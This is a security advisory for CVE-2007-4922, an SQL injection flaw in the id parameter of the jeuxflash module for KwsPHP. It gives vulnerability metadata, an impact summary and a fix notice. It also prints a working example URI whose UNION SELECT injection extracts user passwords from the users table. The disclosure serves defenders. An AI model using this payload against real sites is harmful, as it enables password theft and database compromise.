Module jeuxflash for Kwsphp ID Parameter SQL Injection Vulnerability

Bugtraq ID:	25658
Class:	Input Validation Error
CVE:	CVE-2007-4922
Remote:	Yes
Local:	No
Published:	Sep 13 2007 12:00AM
Updated:	May 07 2015 05:35PM
Credit:	HouSSamix and ToXiC350 are credited with the discovery of this vulnerability.
Vulnerable:	Module jeuxflash Module jeuxflash 1_0
Not Vulnerable:

Module jeuxflash for Kwsphp ID Parameter SQL Injection Vulnerability

Module jeuxflash for Kwsphp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Module jeuxflash V1_0 is vulnerable; other versions may also be affected.

Module jeuxflash for Kwsphp ID Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/Path/index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pass,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--

Module jeuxflash for Kwsphp ID Parameter SQL Injection Vulnerability

Solution:
The vendor released an update to address this issue. Please see the references for more information.

Module jeuxflash for Kwsphp ID Parameter SQL Injection Vulnerability

References:

• Corrective Measure Of Safety (KwsPHP)
  
• Module jeuxflash Download Page (Module jeuxflash)